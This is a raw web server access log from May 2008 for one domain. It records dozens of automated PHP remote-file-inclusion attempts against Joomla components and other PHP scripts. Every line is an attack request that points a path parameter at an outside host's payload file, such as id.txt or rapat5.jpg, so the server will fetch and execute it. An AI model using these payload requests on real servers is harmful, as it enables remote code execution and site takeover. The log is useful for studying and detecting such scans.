72.18.155.74 - - [28/May/2008:11:02:20 -0700] "GET //include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:02:21 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:02:21 -0700] "GET //include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:02:21 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.163.169.99 - - [28/May/2008:11:02:26 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.163.169.99 - - [28/May/2008:11:02:26 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.163.169.99 - - [28/May/2008:11:02:27 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.163.169.99 - - [28/May/2008:11:02:27 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:02:29 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:02:29 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:02:29 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:02:29 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:02:29 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:02:29 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:02:34 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:02:34 -0700] "GET //include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:02:34 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
92.48.65.154 - - [28/May/2008:11:02:40 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://internetforall.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.65.154 - - [28/May/2008:11:02:40 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://internetforall.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.65.154 - - [28/May/2008:11:02:41 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://internetforall.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.65.154 - - [28/May/2008:11:02:41 -0700] "GET /logs/access_071230.log//modules/vwar/admin/errors.php?error=http://internetforall.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:02:43 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:02:43 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:02:45 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.63.40.205 - - [28/May/2008:11:02:46 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:03:04 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:03:04 -0700] "GET //include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:03:05 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:03:07 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:03:07 -0700] "GET //include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:03:08 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.168.36.247 - - [28/May/2008:11:03:19 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.168.36.247 - - [28/May/2008:11:03:19 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:03:21 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:03:21 -0700] "GET //include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:03:21 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:03:23 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:03:23 -0700] "GET //include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:03:24 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:03:26 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:03:26 -0700] "GET //include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:03:26 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.179.0.195 - - [28/May/2008:11:03:37 -0700] "GET /logs/access.log/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
202.179.0.195 - - [28/May/2008:11:03:38 -0700] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
78.41.233.81 - - [28/May/2008:11:03:38 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.179.0.195 - - [28/May/2008:11:03:38 -0700] "GET /logs/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
78.41.233.81 - - [28/May/2008:11:03:38 -0700] "GET //include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.41.233.81 - - [28/May/2008:11:03:38 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.41.233.81 - - [28/May/2008:11:03:39 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.194.149.96 - - [28/May/2008:11:03:39 -0700] "GET /logs/access_080221.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
78.41.233.81 - - [28/May/2008:11:03:40 -0700] "GET //include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.41.233.81 - - [28/May/2008:11:03:40 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.190.24.146 - - [28/May/2008:11:03:44 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.190.24.146 - - [28/May/2008:11:03:45 -0700] "GET //include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.190.24.146 - - [28/May/2008:11:03:45 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.233.25.202 - - [28/May/2008:11:04:02 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.233.25.202 - - [28/May/2008:11:04:10 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.233.25.202 - - [28/May/2008:11:04:11 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.79" "www.dmulk.com"
203.22.204.188 - - [28/May/2008:11:04:15 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [28/May/2008:11:04:15 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [28/May/2008:11:04:15 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.233.25.202 - - [28/May/2008:11:04:16 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.79" "www.dmulk.com"
210.233.25.202 - - [28/May/2008:11:04:17 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.22.204.188 - - [28/May/2008:11:04:19 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.233.25.202 - - [28/May/2008:11:04:21 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.63.40.205 - - [28/May/2008:11:04:24 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.63.40.205 - - [28/May/2008:11:04:24 -0700] "GET //ashnews.php?pathtoashnews=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.63.40.205 - - [28/May/2008:11:04:25 -0700] "GET /logs//ashnews.php?pathtoashnews=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.22.204.188 - - [28/May/2008:11:04:44 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [28/May/2008:11:04:44 -0700] "GET //ashnews.php?pathtoashnews=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.8.73.90 - - [28/May/2008:11:04:56 -0700] "GET /logs/access_071218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.8.73.90 - - [28/May/2008:11:04:56 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.8.73.90 - - [28/May/2008:11:04:57 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:05:16 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:05:17 -0700] "GET //ashnews.php?pathtoashnews=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:11:05:45 -0700] "GET /logs////////////////////////?includes/config-global.php?_SESSION[docroot_path]=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 200 49442 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:11:05:48 -0700] "GET ////////////////////////?includes/config-global.php?_SESSION[docroot_path]=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
200.62.55.115 - - [28/May/2008:11:05:58 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.bestpaket.ru/netcat//dump/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.55.115 - - [28/May/2008:11:05:58 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.bestpaket.ru/netcat//dump/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.87.191.61 - - [28/May/2008:11:06:03 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.opns.be/images/stories/er.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.87.191.61 - - [28/May/2008:11:06:03 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.opns.be/images/stories/er.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
61.63.40.205 - - [28/May/2008:11:06:16 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.63.40.205 - - [28/May/2008:11:06:16 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.63.40.205 - - [28/May/2008:11:06:17 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.62.55.102 - - [28/May/2008:11:06:22 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.55.102 - - [28/May/2008:11:06:22 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [28/May/2008:11:06:32 -0700] "GET /logs/access.log//?mosConfig_absolute_path=http://gsis.bogo.net/bbs/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [28/May/2008:11:06:33 -0700] "GET //?mosConfig_absolute_path=http://gsis.bogo.net/bbs/test.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [28/May/2008:11:06:34 -0700] "GET /logs//?mosConfig_absolute_path=http://gsis.bogo.net/bbs/test.txt? HTTP/1.1" 200 49420 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.65.154 - - [28/May/2008:11:06:37 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://internetforall.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:11:06:38 -0700] "GET /logs/access_080327.log//index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.8.73.90 - - [28/May/2008:11:06:39 -0700] "GET /logs/access_080201.log//modules/My_eGallery/index.php?basepath=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:06:46 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:06:47 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.160.203.190 - - [28/May/2008:11:06:47 -0700] "GET /logs/access_080215.log//?mosConfig_absolute_path=http://gsis.bogo.net/bbs/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:06:50 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:06:50 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:06:50 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:06:50 -0700] "GET //ashnews.php?pathtoashnews=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:06:51 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:11:07:04 -0700] "GET /logs/access_080228.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:11:07:04 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:11:07:04 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.87.191.61 - - [28/May/2008:11:07:07 -0700] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.opns.be/images/stories/er.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:11:07:07 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:11:07:07 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:11:07:08 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:11:07:10 -0700] "GET /logs/access_080301.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:11:07:12 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:11:07:13 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:11:07:13 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:11:07:18 -0700] "GET /logs/access_080212.log//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
